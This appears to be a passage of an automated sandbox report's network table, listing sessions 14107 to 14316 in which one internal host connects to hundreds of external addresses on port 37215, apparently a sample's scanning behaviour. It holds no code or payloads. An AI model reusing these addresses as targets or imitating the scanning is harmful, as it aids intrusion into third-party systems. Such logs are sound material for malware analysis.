                                                  14107192.168.2.1360518157.126.171.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14108192.168.2.1352644157.59.142.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14109192.168.2.134710441.229.244.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14110192.168.2.1358920197.177.80.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14111192.168.2.133850041.35.67.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14112192.168.2.134236641.105.196.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14113192.168.2.134526041.185.114.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14114192.168.2.1337254157.30.97.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14115192.168.2.133905486.240.61.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14116192.168.2.1355986157.129.238.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14117192.168.2.1350008197.136.74.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14118192.168.2.1342020197.63.244.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14119192.168.2.1349666157.30.115.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14120192.168.2.1343200157.58.156.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14121192.168.2.1355828157.115.223.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14122192.168.2.135479019.197.84.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14123192.168.2.133671841.143.12.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14124192.168.2.13548561.243.11.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14125192.168.2.1343376197.5.42.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14126192.168.2.1353626197.45.230.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14127192.168.2.1334146197.196.36.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14128192.168.2.135379012.214.2.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14129192.168.2.136051041.243.88.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14130192.168.2.134713278.233.121.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14131192.168.2.1355702197.249.64.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14132192.168.2.134582276.37.160.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14133192.168.2.135803241.86.57.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14134192.168.2.133742841.48.137.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14135192.168.2.133898641.57.32.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14136192.168.2.135952841.100.40.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14137192.168.2.135426641.123.210.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14138192.168.2.1358080108.110.160.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14139192.168.2.1335662197.81.164.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14140192.168.2.1358154217.175.218.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14141192.168.2.133880872.183.207.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14142192.168.2.1360968157.43.36.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14143192.168.2.1336656197.219.177.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14144192.168.2.133704641.250.192.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14145192.168.2.1335784157.67.96.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14146192.168.2.1334972197.159.47.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14147192.168.2.133674241.209.163.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14148192.168.2.1337696157.117.108.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14149192.168.2.1333670171.71.187.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14150192.168.2.1349368197.125.122.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14151192.168.2.134257466.199.71.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14152192.168.2.1359490157.1.9.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14153192.168.2.1355726197.128.159.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14154192.168.2.1341102150.78.164.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14155192.168.2.135950497.1.23.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14156192.168.2.134026041.59.116.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14157192.168.2.13479721.66.176.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14158192.168.2.1355084197.23.116.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14159192.168.2.1356984171.32.213.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14160192.168.2.134377835.54.249.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14161192.168.2.133766041.186.95.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14162192.168.2.133501041.103.55.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14163192.168.2.1337724157.110.247.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14164192.168.2.133945662.211.57.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14165192.168.2.1359136181.63.233.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14166192.168.2.1336750197.143.237.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14167192.168.2.1338982157.73.169.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14168192.168.2.1348598157.79.70.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14169192.168.2.133527068.86.136.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14170192.168.2.1342544202.52.205.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14171192.168.2.1345872157.251.235.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14172192.168.2.1343118157.32.136.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14173192.168.2.1344616157.143.119.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14174192.168.2.1351926188.244.42.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14175192.168.2.1336316157.214.48.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14176192.168.2.134804614.4.173.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14177192.168.2.1334596202.54.151.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14178192.168.2.1339000157.210.248.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14179192.168.2.1354090197.198.149.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14180192.168.2.135914249.240.74.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14181192.168.2.1350560157.203.39.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14182192.168.2.135462441.21.39.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14183192.168.2.1337808157.164.169.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14184192.168.2.1359124157.231.206.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14185192.168.2.1339010101.139.187.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14186192.168.2.1353772157.43.120.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14187192.168.2.1343258157.203.182.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14188192.168.2.13547024.32.129.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14189192.168.2.1355848167.30.110.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14190192.168.2.1359494157.148.225.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14191192.168.2.1352986197.78.64.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192192.168.2.1354560157.193.14.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14193192.168.2.1339420157.252.207.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14194192.168.2.1345446157.223.188.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14195192.168.2.1346276220.11.141.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14196192.168.2.1359970157.153.247.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14197192.168.2.1336568157.176.216.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14198192.168.2.134050441.79.106.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14199192.168.2.1357688197.150.166.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14200192.168.2.1335860197.151.115.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14201192.168.2.1359660197.24.55.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14202192.168.2.1339882197.43.103.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14203192.168.2.134150624.138.93.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14204192.168.2.1356272107.72.190.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14205192.168.2.1351756157.211.183.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14206192.168.2.135886641.58.42.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14207192.168.2.1352908157.140.160.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14208192.168.2.1344742197.233.177.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14209192.168.2.1336402197.255.102.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14210192.168.2.1346336197.195.51.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14211192.168.2.1357950157.240.103.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14212192.168.2.1354864197.105.17.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14213192.168.2.1344662166.237.83.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14214192.168.2.1355078157.149.83.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14215192.168.2.1343706186.238.220.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14216192.168.2.1340134197.118.123.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14217192.168.2.1350464157.239.221.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14218192.168.2.135470041.141.62.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14219192.168.2.1344114138.13.67.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14220192.168.2.1342116197.135.102.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14221192.168.2.1346074157.247.126.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14222192.168.2.135821241.253.30.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14223192.168.2.135480241.255.107.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14224192.168.2.1354898157.46.117.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14225192.168.2.1355806197.54.235.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14226192.168.2.1334582157.55.55.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14227192.168.2.135851462.33.18.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14228192.168.2.1352836141.234.70.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14229192.168.2.133985641.52.198.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14230192.168.2.134259864.251.65.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14231192.168.2.1336216157.211.149.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14232192.168.2.1349732157.238.46.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14233192.168.2.135203241.3.248.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14234192.168.2.133390441.69.160.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14235192.168.2.133584641.207.143.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14236192.168.2.133710841.191.122.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14237192.168.2.1333020196.72.235.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14238192.168.2.1347134157.143.212.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14239192.168.2.135043441.24.159.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14240192.168.2.1343956157.193.46.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14241192.168.2.1340828114.114.85.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14242192.168.2.1358618197.80.101.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14243192.168.2.133944041.227.176.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14244192.168.2.134300423.80.248.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14245192.168.2.1358630157.247.81.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14246192.168.2.1339992157.71.196.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14247192.168.2.135670241.104.254.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14248192.168.2.134100277.238.237.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14249192.168.2.1353978167.134.159.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14250192.168.2.1346674101.190.186.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14251192.168.2.1353454197.104.142.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14252192.168.2.1342860197.124.152.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14253192.168.2.1348860157.131.14.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14254192.168.2.1359758197.238.91.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14255192.168.2.135247441.47.62.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14256192.168.2.1334694199.118.13.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14257192.168.2.1334532197.18.38.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14258192.168.2.133997841.34.100.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14259192.168.2.1352894157.236.221.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14260192.168.2.1332910197.51.94.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14261192.168.2.135578041.44.89.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14262192.168.2.1337892197.42.216.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14263192.168.2.1340484157.253.210.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14264192.168.2.135579641.166.234.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14265192.168.2.1338118195.22.92.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14266192.168.2.1337900157.232.40.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14267192.168.2.1348730197.56.28.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14268192.168.2.1334808190.14.5.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14269192.168.2.135733041.238.209.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14270192.168.2.1346556197.94.142.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14271192.168.2.1349458157.20.240.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14272192.168.2.1343956197.162.73.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14273192.168.2.1337042197.21.187.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14274192.168.2.1359570197.190.240.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14275192.168.2.134979241.38.245.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14276192.168.2.1355308157.41.207.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14277192.168.2.1345032157.23.223.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14278192.168.2.134784441.75.91.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14279192.168.2.1339670157.27.144.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14280192.168.2.1334310166.189.177.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14281192.168.2.1355758197.207.177.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14282192.168.2.1334246157.92.31.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14283192.168.2.1350242128.172.110.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14284192.168.2.1338066117.122.240.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14285192.168.2.136012241.96.196.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14286192.168.2.133905841.25.181.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14287192.168.2.1347000197.51.80.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14288192.168.2.1332786197.133.183.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14289192.168.2.1359666116.207.14.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14290192.168.2.1339714157.114.238.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14291192.168.2.134503841.70.212.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14292192.168.2.1343554197.139.196.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14293192.168.2.135263641.181.80.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14294192.168.2.1350590157.94.65.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14295192.168.2.135037293.252.131.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14296192.168.2.133676241.86.251.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14297192.168.2.134886039.9.117.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14298192.168.2.134380241.219.21.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14299192.168.2.1339628157.200.98.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14300192.168.2.1335644197.206.103.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14301192.168.2.135473641.107.23.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14302192.168.2.135216241.44.90.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14303192.168.2.134839041.126.7.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14304192.168.2.1353356197.183.155.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14305192.168.2.1343616157.37.102.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14306192.168.2.1360064157.121.228.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14307192.168.2.1346168197.146.181.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14308192.168.2.133381441.123.186.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14309192.168.2.135663841.14.234.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14310192.168.2.1353584197.209.113.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14311192.168.2.134048018.236.4.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14312192.168.2.1357952197.7.107.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14313192.168.2.1346230157.147.62.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14314192.168.2.1342064157.7.156.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14315192.168.2.1350564197.213.131.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14316192.168.2.1351782197.175.250.10337215
